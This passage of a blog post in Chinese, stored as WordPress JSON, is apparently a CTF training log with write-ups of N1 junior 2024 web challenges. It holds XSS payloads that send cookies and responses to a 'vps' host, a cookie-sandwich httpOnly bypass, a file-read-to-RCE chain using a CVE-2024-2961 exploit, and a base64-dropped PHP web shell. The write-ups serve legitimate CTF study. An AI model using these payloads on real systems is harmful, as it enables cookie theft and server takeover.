worker_connections 1024;\n}\n\nhttp {\n proxy_cache_path \/var\/cache\/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;\n\n include \/etc\/nginx\/mime.types;\n default_type application\/octet-stream;\n\n server {\n listen 80 default_server;\n server_name _;\n\n location \/ {\n proxy_pass http:\/\/127.0.0.1:5000;\n }\n\n location \/api\/bio\/ {\n return 403;\n }\n\n location ~ .(css|js)$ {\n proxy_pass http:\/\/127.0.0.1:5000;\n proxy_ignore_headers Vary;\n proxy_cache static_cache;\n proxy_cache_valid 200 10m;\n }\n }\n}<\/code><\/pre>\n\n\n\nlocation \/api\/bio\/ {\n return 403;\n}<\/code><\/pre>\n\n\n\ncontext.add_cookies([{\n 'name': 'flag',\n 'value': flag_value,\n 'domain': 'localhost',\n 'path': '\/',\n 'httponly': True\n}])<\/code><\/pre>\n\n\n\n\u8fd9\u4e2ahttpOnly\u5927\u5c0f\u5199\u62fc\u9519\u4e86\u7adf\u7136\uff08\uff09\uff0cflag \u76f4\u63a5\u4f1a\u8ddfcookie\u4e00\u8d77\u5e26\u51fa\u6765\uff0c\u6b63\u5e38\u505a\u5c31\u884c\u4e86<\/p>\n\n\n\n
\u975e\u9884\u671f<\/h5>\n\n\n\n
\/api\/bio\/\u65e0\u8bba\u662f\u6211\u4eec\u8fd8\u662fbot\u90fd\u662f\u65e0\u6cd5\u8bbf\u95ee\u7684<\/p>\n\n\n\n
\u4f46\u662f\u540e\u9762\u53c8\u5199\u5230<\/p>\n\n\n\n
location ~ .(css|js)$ {\n proxy_pass http:\/\/127.0.0.1:5000;\n proxy_cache static_cache;\n ...\n}<\/code><\/pre>\n\n\n\n\u6f0f\u6d1e\u5728\u4e8eNginx\u4e2d\uff0c\u6b63\u5219\u5339\u914d\uff08~<\/code>\uff09\u7684\u4f18\u5148\u7ea7\u901a\u5e38\u9ad8\u4e8e\u666e\u901a\u5b57\u7b26\u4e32\u524d\u7f00\u5339\u914d<\/p>\n\n\n\n\u4e5f\u5c31\u662f\u8bf4\uff0c\u5982\u679c\u5b83\u5339\u914d\u5230\u4e86\u6700\u540e\u7684.js\u6216.css\uff0c\u5c31\u4f1a\u76f4\u63a5\u5ffd\u7565403\u7684\/api\/bio\/<\/p>\n\n\n\n
if not current_user.username == username:\n return \"Unauthorized\", 401\n user = USERS_DB.get(username)\n if not user:\n return \"User not found.\", 404\n return user.bio<\/code><\/pre>\n\n\n\n\u53ea\u6709\u767b\u5f55\u4e3a 1.js\uff0c\u624d\u80fd\u8bbf\u95ee \/api\/bio\/1.js<\/p>\n\n\n\n
\u5c06 bio \u8bbe\u7f6e\u4e3a\u6211\u4eec\u7684Payload<\/p>\n\n\n\n
<script>fetch('http:\/\/vps\/'+document.cookie);<\/script><\/code><\/pre>\n\n\n\n\u7531\u4e8e Nginx \u914d\u7f6e\u4e86 proxy_cache\uff0c\u5f53\u4f5c\u4e3a1.js\u8bbf\u95ee\u4e00\u6b21\/api\/bio\/1.js\u65f6\uff0cNginx\u4f1a\u628aurl\u5b58\u5165\u7f13\u5b58<\/p>\n\n\n\n
\u5728\u670d\u52a1\u5668\u4e0a\u8bbe\u7f6e\u76d1\u542c\uff0c\u8bbf\u95ee \/view?username=1.js\u8ba9bot\u89e6\u53d1\u8fd9\u4e2aurl\uff0c\u8fdb\u800c\u8bfb\u5230bot\u7684cookie\u7684flag<\/p>\n\n\n\n
\u9884\u671f<\/h5>\n\n\n\n
\u5982\u679chttpOnly\u5927\u5c0f\u5199\u5bf9\u4e86<\/p>\n\n\n\n
\u53c2\u8003\uff1ahttps:\/\/portswigger.net\/research\/stealing-httponly-cookies-with-the-cookie-sandwich-technique<\/p>\n\n\n\n
\u4e24\u9762\u5305\u5939\ud83e\uddc0\u6cd5\uff08\uff09<\/p>\n\n\n\n
\u4e3a\u4e86\u517c\u5bb9\u8001\u65e7\u7684\u6807\u51c6\uff0c\u8bb8\u591a\u89e3\u6790\u5668\u5728\u5904\u7406 Cookie \u503c\u65f6\u9075\u5faa\u4e00\u4e2a\u903b\u8f91\uff1a\u5982\u679c\u503c\u7684\u5f00\u5934\u662f\u53cc\u5f15\u53f7 “\uff0c\u90a3\u4e48\u5b83\u5fc5\u987b\u8bfb\u53d6\u5230\u4e0b\u4e00\u4e2a\u53cc\u5f15\u53f7\u624d\u7b97\u7ed3\u675f<\/p>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\uff0c\u5728\u6d4f\u89c8\u5668\u53d1\u9001 HTTP \u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u5982\u679c\u4f7f\u7528\u4e86\u53cc\u5f15\u53f7\u5305\u88f9\u8d77\u6765<\/p>\n\n\n\n
ticket=\"start; flag=flag; aaa=end\"<\/code><\/pre>\n\n\n\n\u5b83\u9876\u591a\u4f1a\u8ba4\u4e3aticket\u7684\u503c\u662f”start\uff0cflag\u7684\u503c\u662fflag\uff0caaa\u7684\u503c\u662fend”<\/p>\n\n\n\n
\u4f46\u540e\u7aef\u7684\u89e3\u6790\u5668\u4e0d\u8fd9\u4e48\u8ba4\u4e3a<\/p>\n\n\n\n
\u5f53\u5b83\u9047\u5230\u7b2c\u4e00\u4e2a\u5206\u53f7\u65f6\uff0c\u4ed6\u5c31\u4f1a\u8ba4\u4e3a\u88ab\u53cc\u5f15\u53f7\u5305\u88f9\u8d77\u6765\u7684\u5185\u5bb9\u662f\u4e00\u4e2a\u6574\u4f53\u7684\u503c\uff0c\u53cc\u5f15\u53f7\u5185\u90e8\u7684\u5206\u53f7\u662f\u666e\u901a\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\uff0c\u89e3\u6790\u5668\u8ba4\u4e3aticket\u7684\u503c\u662fstart; flag=flag; aaa=end\u3002\u4ece\u800c\u7ed5\u8fc7httpOnly<\/p>\n\n\n\n
@app.route('\/ticket', methods=['POST'])\ndef ticket():\n ticket_val = request.form['ticket'] # \u653b\u51fb\u8005\u63a7\u5236\u8fd9\u91cc\n response = make_response(...)\n response.set_cookie('ticket', ticket_val) # \u8fd9\u91cc\u662f\u5173\u952e\uff01\n return response<\/code><\/pre>\n\n\n\n\u518d\u901a\u8fc7\u8fd9\u4e00\u6bb5\u7684response.headers.get(‘Set-Cookie’)\u8bfb\u51fa\u6765<\/p>\n\n\n\n
exp\uff1a<\/p>\n\n\n\n
<script>\nconst url = new URL(\"http:\/\/localhost\/ticket\");\ndocument.cookie = `$Version=1; domain=${url.hostname}; path=${url.pathname};`;\ndocument.cookie = `ticket=\"test; domain=${url.hostname}; path=${url.pathname};`;\ndocument.cookie = `aaa=bbb\"; domain=${url.hostname}; path=\/;`;\nfetch(\"\/ticket\", {\n credentials: 'include',\n}).then(response => {\n return response.text();\n}).then(data => {\n fetch(\"http:\/\/vps:23333\/\", {\n method: \"POST\",\n body: data,\n });\n})\n<\/script><\/code><\/pre>\n\n\n\n2024 N1 junior<\/h3>\n\n\n\nGavatar<\/h4>\n\n\n\n
\uff08\u53c8\u662f\u5185\u5b58\uff0c\u53c8\u662f\u5185\u5b58\uff09<\/p>\n\n\n\n
\u9898\u76ee\u6a21\u4eff\u4e86\u4e00\u4e2a\u5e94\u7528\u5141\u8bb8\u7528\u6237\u4e0a\u4f20\u548c\u5c55\u793a\u81ea\u5df1\u7684\u5934\u50cf<\/p>\n\n\n\n
\u6f0f\u6d1e\u70b9\u5728\u8fd9\u91cc<\/p>\n\n\n\n
<?php\nrequire_once 'common.php';\n\n$user = getCurrentUser();\nif (!$user) header('Location: index.php');\n\n$avatarDir = __DIR__ . '\/avatars';\nif (!is_dir($avatarDir)) mkdir($avatarDir, 0755);\n\n$avatarPath = \"$avatarDir\/{$user['id']}\";\n\nif (!empty($_FILES['avatar']['tmp_name'])) {\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n if (!in_array($finfo->file($_FILES['avatar']['tmp_name']), ['image\/jpeg', 'image\/png', 'image\/gif'])) {\n die('Invalid file type');\n }\n move_uploaded_file($_FILES['avatar']['tmp_name'], $avatarPath);\n} elseif (!empty($_POST['url'])) {\n $image = @file_get_contents($_POST['url']);\n if ($image === false) die('Invalid URL');\n file_put_contents($avatarPath, $image);\n}\n\nheader('Location: profile.php');<\/code><\/pre>\n\n\n\nfile_get_contents\u51fd\u6570\uff0c\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff0cfile:\/\/\/etc\/passwd\u5c31\u53ef\u4ee5\u8bfb\u6587\u4ef6<\/p>\n\n\n\n
\u96be\u70b9\u5728\u4e8e\u8fd9\u9053\u9898\u9700\u8981\u6267\u884c \/readflag \u547d\u4ee4\u624d\u80fd\u62ff\u5230 flag\uff0c\u67e5\u770bphp\u7248\u672c\uff0c8.3.4\uff0c\u9700\u8981\u627e\u4e00\u4e2acve<\/p>\n\n\n\n
CVE-2024-2961<\/p>\n\n\n\n
\u5927\u81f4\u539f\u7406\u8fd8\u5c31\u662f<\/p>\n\n\n\n
1.\u8bfb\u53d6proc\/self\/maps\u7b97\u5730\u5740<\/p>\n\n\n\n
2.\u8bfb\u53d6\u6307\u5b9a\u7684\u5305\u542bsystem\u51fd\u6570\u5730\u5740\u6587\u4ef6<\/p>\n\n\n\n
3.\u76f4\u63a5\u751f\u6210POC\u8fbe\u5230RCE<\/p>\n\n\n\n
\u7136\u540e\u5728 Linux \u673a\u5668\u4e0a\u6267\u884c\u547d\u4ee4\u5b9e\u73b0RCE<\/p>\n\n\n\n
python cnext-exploit.py http:\/\/localhost:8000 \"echo PD89YCRfR0VUWzBdYD8+ | base64 -d > cmd.php\"<\/code><\/pre>\n\n\n\n<?=`$_GET[0]`?><\/code><\/pre>\n\n\n\n\u8bbf\u95ee \/cmd.php?0=\/readflag<\/code> \u62ff\u5230 flag<\/p>\n\n\n\n\u5b66\u4e60\u8ba1\u5212<\/h2>\n\n\n\n
\u8fd9\u4e0d\u662f\u6211\u7b2c\u4e00\u6b21\u5c1d\u8bd5N1 junior\uff0c\u5927\u6982\u5728\u4e24\u4e2a\u6708\u4e4b\u524d\u5c31\u6597\u80c6\u5c1d\u8bd5\u505a\u4e86\u4e00\u4e0b\uff0c\u610f\u6599\u4e4b\u4e2d\u770bwp\u4ec0\u4e48\u90fd\u770b\u4e0d\u61c2\uff0c\u5f53\u65f6\u5c31\u76f4\u63a5\u653e\u5f03\u4e86\u3002\u73b0\u5728\u518d\u56de\u5934\u6765\u770bN1 junior\uff0c\u867d\u7136\u4e0d\u80fd\u8bf4\u4e00\u773c\u5c31\u4f1a\uff0c\u4f46\u6700\u8d77\u7801\u6bd4\u4e4b\u524d\u7a0d\u5fae\u5f3a\u4e00\u70b9\u4e86\uff0c\u8fd9\u51e0\u9053\u9898\u4e5f\u662f\u8fb9\u770b\u8fb9\u5b66\u624d\u505a\u51fa\u6765\u7684\u3002\u81f3\u5c11\u6211\u73b0\u5728\u8ba4\u4e3a\uff0c\u6216\u8bb8\u5c31\u5e94\u8be5\u591a\u505a\u90a3\u4e9b\u7565\u9ad8\u4e8e\u81ea\u5df1\u6c34\u5e73\u7684\u9898\u76ee\uff0c\u624d\u80fd\u5b66\u5230\u66f4\u591a\u4e1c\u897f\u3002\u8fd9\u8ba9\u6211\u60f3\u8d77\u6765\u9ad8\u4e2d\u8001\u5e08\u544a\u8bc9\u6211\u7684\u4e00\u53e5\u8bdd\u201c\u6c42\u4e0a\u5f97\u4e2d\uff0c\u6c42\u4e2d\u5f97\u4e0b\u201d\uff0c\u4e5f\u7b97\u662f\u5bf9\u8fd9\u53e5\u8bdd\u6709\u4e86\u66f4\u6df1\u7684\u4f53\u4f1a\u3002<\/p>\n\n\n\n
2024 N1junior\u8fd8\u6ca1\u6709\u5168\u90e8\u590d\u73b0\u5b8c\uff0c\u8fd8\u5269\u4e0b\u4e00\u5468\u590d\u4e60\u65f6\u95f4\u3002\u8003\u5b8c\u4e86\u4e4b\u540e\uff0c\u6211\u6253\u7b97\u590d\u73b0\u5b8cN1\u7684\u9898\uff0c\u518d\u5c1d\u8bd5\u4e00\u4e0b XCTF \u5206\u7ad9\u8d5b\u7684\u9898\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
UKFC\u6218\u961f\u8bad\u7ec3\u65e5\u5fd7\u2014\u2014\u8bb0\u5f55PHP\u53cd\u5e8f\u5217\u5316\u8fdb\u9636\u3001\u9b54\u672f\u65b9\u6cd5\u8be6\u89e3\u3001\u5404\u7c7bCTF\u9776\u573a\u5b9e\u6218\uff08CTFshow\u3001BUU\uff09\u3001SSRF\u3001\u6587\u4ef6\u5305\u542b\u7b49Web\u5b89\u5168\u653b\u9632\u6280\u672f\u7684\u7cfb\u7edf\u5b66\u4e60\u8fc7\u7a0b\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,8],"tags":[52,34,51,43,53,35,36,47,54,6,5,50],"class_list":["post-40","post","type-post","status-publish","format-standard","hentry","category-rz","category-zs","tag-buu","tag-ctf","tag-ctfshow","tag-php","tag-ssrf","tag-ukfc","tag-web","tag-47","tag-54","tag-6","tag-5","tag-50"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/40","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/comments?post=40"}],"version-history":[{"count":2,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/40\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/40\/revisions\/132"}],"wp:attachment":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/media?parent=40"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/categories?post=40"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/tags?post=40"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}